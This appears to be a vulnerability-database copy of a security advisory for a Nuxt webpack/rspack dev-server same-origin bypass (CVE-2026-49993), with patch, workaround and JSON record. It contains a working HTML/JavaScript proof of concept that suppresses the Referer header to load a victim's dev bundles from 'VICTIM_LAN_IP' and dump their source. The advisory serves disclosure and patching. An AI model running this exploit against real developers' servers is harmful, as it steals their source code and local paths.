GHSA-X6QJ-4H56-5RJ5

Vulnerability from github – Published: 2026-06-16 23:39 – Updated: 2026-06-16 23:39
VLAI
Summary
@nuxt/webpack-builder and @nuxt/rspack-builder dev server same-origin check bypassed when Sec-Fetch-Site, Origin, and Referer are all absent (incomplete fix for GHSA-6m52-m754-pw2g)
Details

Summary

This is an incomplete fix for GHSA-6m52-m754-pw2g. Source code may still be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. nuxt dev --host) and the developer opens a malicious site on the same network.

Details

The fix for GHSA-6m52-m754-pw2g added an Origin / Referer fallback to the dev-middleware same-origin check, with a return true branch when neither header is present so that non-browser clients (curl, the HMR client, address-bar navigation) keep working.

That fallback is bypassed when a cross-origin attacker request reaches the dev server with all three signal headers absent:

  • Sec-Fetch-Site is not sent by browsers to non-potentially-trustworthy destinations (HTTP on a non-loopback address).
  • Origin is not sent on non-CORS subresource fetches (a bare <script> with no crossorigin).
  • Referer can be suppressed by the attacker page with <meta name="referrer" content="no-referrer"> or referrerpolicy="no-referrer" on the <script> element.

A classic <script src="http://VICTIM_LAN_IP:3000/_nuxt/app.js" referrerpolicy="no-referrer"> from a non-trustworthy attacker origin produces exactly that header set, the request is allowed, and the attacker page can read the built source out of window.webpackChunk* via Function.prototype.toString().

Since the attack requires the dev server to be reachable via a non-potentially-trustworthy origin, only apps using --host (or --host 0.0.0.0) are affected. Chrome 142+ users are also protected by Local Network Access restrictions.

PoC

  1. Create a Nuxt project with the webpack / rspack builder.
  2. Run npm run dev -- --host 0.0.0.0.
  3. Open http://localhost:3000 on the developer machine.
  4. From a different LAN host, serve the page below and open it in the same browser.
  5. The compiled module source is exfiltrable from window.webpackChunknuxt_<projectname>.
<!doctype html>
<meta name="referrer" content="no-referrer">
<script>
  ['/_nuxt/runtime.js', '/_nuxt/app.js'].forEach(p => {
    const s = document.createElement('script')
    s.src = 'http://VICTIM_LAN_IP:3000' + p
    s.referrerPolicy = 'no-referrer'
    document.head.appendChild(s)
  })
  setTimeout(() => {
    const key = Object.keys(window).find(k => k.startsWith('webpackChunk'))
    for (const [, mods] of window[key]) {
      for (const id in mods) {
        console.log(id, mods[id].toString())
      }
    }
  }, 1500)
</script>

Impact

Users using the webpack / rspack builder with nuxt dev --host may get the built source code read by malicious websites on the same network, including module identifiers, the developer's local filesystem path, and any developer-controlled strings inlined into the bundle.

This vulnerability does not affect Chrome 142+ (and other Chromium-based browsers) users due to Local Network Access restrictions.

The default Vite builder is not affected.

Patches

Fixed in @nuxt/webpack-builder@4.4.7 / @nuxt/rspack-builder@4.4.7 and backported to @nuxt/webpack-builder@3.21.7 / @nuxt/rspack-builder@3.21.7 by #35200 (4.x: commit e351de94; 3.x: commit 77187ee4). The dev-middleware same-origin check now treats a request with no Sec-Fetch-Site, no Origin, and no Referer as same-origin only when the dev server is loopback-bound, closing the header-suppression bypass.

The fix only ships for the @nuxt/webpack-builder and @nuxt/rspack-builder packages. The default Vite builder was not affected.

Workarounds

If you cannot upgrade immediately:

  • Don't use nuxt dev --host. Bind the dev server to localhost (the default) and tunnel from other devices via SSH or a reverse proxy that enforces same-origin checks.
  • Use Chrome 142+ or another Chromium-based browser that enforces Local Network Access restrictions.
  • Switch to the Vite builder for development.

Credit

Reported by Berkan SAL (@Uhudsavasindankacanokcu2) via the Vercel Open Source HackerOne program.

Independently reported by @DavidCarliez via GitHub's coordinated disclosure flow (GHSA-xw96-2f5x-v9pv), closed as a duplicate of this advisory.

Severity
5.9 (Medium)
CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@nuxt/webpack-builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.4.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@nuxt/webpack-builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.15.4"
            },
            {
              "fixed": "3.21.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@nuxt/rspack-builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "4.0.0"
            },
            {
              "fixed": "4.4.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "npm",
        "name": "@nuxt/rspack-builder"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.15.4"
            },
            {
              "fixed": "3.21.7"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-49993"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-749"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-16T23:39:16Z",
    "nvd_published_at": "2026-06-12T14:16:32Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nThis is an incomplete fix for [GHSA-6m52-m754-pw2g](https://github.com/nuxt/nuxt/security/advisories/GHSA-6m52-m754-pw2g). Source code may still be stolen during dev when using the webpack / rspack builder if the dev server is bound to a non-loopback address (e.g. `nuxt dev --host`) and the developer opens a malicious site on the same network.\n\n### Details\nThe fix for [GHSA-6m52-m754-pw2g](https://github.com/nuxt/nuxt/security/advisories/GHSA-6m52-m754-pw2g) added an `Origin` / `Referer` fallback to the dev-middleware same-origin check, with a `return true` branch when neither header is present so that non-browser clients (curl, the HMR client, address-bar navigation) keep working.\n\nThat fallback is bypassed when a cross-origin attacker request reaches the dev server with all three signal headers absent:\n\n- `Sec-Fetch-Site` is [not sent by browsers to non-potentially-trustworthy destinations](https://w3c.github.io/webappsec-fetch-metadata/#sec-fetch-site-header) (HTTP on a non-loopback address).\n- `Origin` is not sent on non-CORS subresource fetches (a bare `\u003cscript\u003e` with no `crossorigin`).\n- `Referer` can be suppressed by the attacker page with `\u003cmeta name=\"referrer\" content=\"no-referrer\"\u003e` or `referrerpolicy=\"no-referrer\"` on the `\u003cscript\u003e` element.\n\nA classic `\u003cscript src=\"http://VICTIM_LAN_IP:3000/_nuxt/app.js\" referrerpolicy=\"no-referrer\"\u003e` from a non-trustworthy attacker origin produces exactly that header set, the request is allowed, and the attacker page can read the built source out of `window.webpackChunk*` via `Function.prototype.toString()`.\n\nSince the attack requires the dev server to be reachable via a non-potentially-trustworthy origin, only apps using `--host` (or `--host 0.0.0.0`) are affected. Chrome 142+ users are also protected by [Local Network Access restrictions](https://developer.chrome.com/release-notes/142#local_network_access_restrictions).\n\n### PoC\n1. Create a Nuxt project with the webpack / rspack builder.\n1. Run `npm run dev -- --host 0.0.0.0`.\n1. Open `http://localhost:3000` on the developer machine.\n1. From a different LAN host, serve the page below and open it in the same browser.\n1. The compiled module source is exfiltrable from `window.webpackChunknuxt_\u003cprojectname\u003e`.\n\n```html\n\u003c!doctype html\u003e\n\u003cmeta name=\"referrer\" content=\"no-referrer\"\u003e\n\u003cscript\u003e\n  [\u0027/_nuxt/runtime.js\u0027, \u0027/_nuxt/app.js\u0027].forEach(p =\u003e {\n    const s = document.createElement(\u0027script\u0027)\n    s.src = \u0027http://VICTIM_LAN_IP:3000\u0027 + p\n    s.referrerPolicy = \u0027no-referrer\u0027\n    document.head.appendChild(s)\n  })\n  setTimeout(() =\u003e {\n    const key = Object.keys(window).find(k =\u003e k.startsWith(\u0027webpackChunk\u0027))\n    for (const [, mods] of window[key]) {\n      for (const id in mods) {\n        console.log(id, mods[id].toString())\n      }\n    }\n  }, 1500)\n\u003c/script\u003e\n```\n\n### Impact\nUsers using the webpack / rspack builder with `nuxt dev --host` may get the built source code read by malicious websites on the same network, including module identifiers, the developer\u0027s local filesystem path, and any developer-controlled strings inlined into the bundle.\n\nThis vulnerability does not affect Chrome 142+ (and other Chromium-based browsers) users due to [Local Network Access restrictions](https://developer.chrome.com/release-notes/142#local_network_access_restrictions).\n\nThe default Vite builder is not affected.\n\n### Patches\nFixed in `@nuxt/webpack-builder@4.4.7` / `@nuxt/rspack-builder@4.4.7` and backported to `@nuxt/webpack-builder@3.21.7` / `@nuxt/rspack-builder@3.21.7` by [#35200](https://github.com/nuxt/nuxt/pull/35200) (4.x: commit [`e351de94`](https://github.com/nuxt/nuxt/commit/e351de943e82db16970618b60dc7fdbaa58630f3); 3.x: commit [`77187ee4`](https://github.com/nuxt/nuxt/commit/77187ee4015e9267fb464951542a3e09e8b5fa05)). The dev-middleware same-origin check now treats a request with no `Sec-Fetch-Site`, no `Origin`, and no `Referer` as same-origin only when the dev server is loopback-bound, closing the header-suppression bypass.\n\nThe fix only ships for the `@nuxt/webpack-builder` and `@nuxt/rspack-builder` packages. The default Vite builder was not affected.\n\n### Workarounds\nIf you cannot upgrade immediately:\n\n- Don\u0027t use `nuxt dev --host`. Bind the dev server to `localhost` (the default) and tunnel from other devices via SSH or a reverse proxy that enforces same-origin checks.\n- Use Chrome 142+ or another Chromium-based browser that enforces [Local Network Access restrictions](https://developer.chrome.com/release-notes/142#local_network_access_restrictions).\n- Switch to the Vite builder for development.\n\n### Credit\nReported by Berkan SAL ([@Uhudsavasindankacanokcu2](https://github.com/Uhudsavasindankacanokcu2)) via the Vercel Open Source HackerOne program.\n\nIndependently reported by [@DavidCarliez](https://github.com/DavidCarliez) via GitHub\u0027s coordinated disclosure flow (`GHSA-xw96-2f5x-v9pv`), closed as a duplicate of this advisory.",
  "id": "GHSA-x6qj-4h56-5rj5",
  "modified": "2026-06-16T23:39:17Z",
  "published": "2026-06-16T23:39:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/nuxt/nuxt/security/advisories/GHSA-6m52-m754-pw2g"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nuxt/nuxt/security/advisories/GHSA-x6qj-4h56-5rj5"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-49993"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nuxt/nuxt/pull/35200"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nuxt/nuxt/commit/77187ee4015e9267fb464951542a3e09e8b5fa05"
    },
    {
      "type": "WEB",
      "url": "https://github.com/nuxt/nuxt/commit/e351de943e82db16970618b60dc7fdbaa58630f3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/nuxt/nuxt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:A/AC:H/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "@nuxt/webpack-builder and @nuxt/rspack-builder dev server same-origin check bypassed when Sec-Fetch-Site, Origin, and Referer are all absent (incomplete fix for GHSA-6m52-m754-pw2g)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.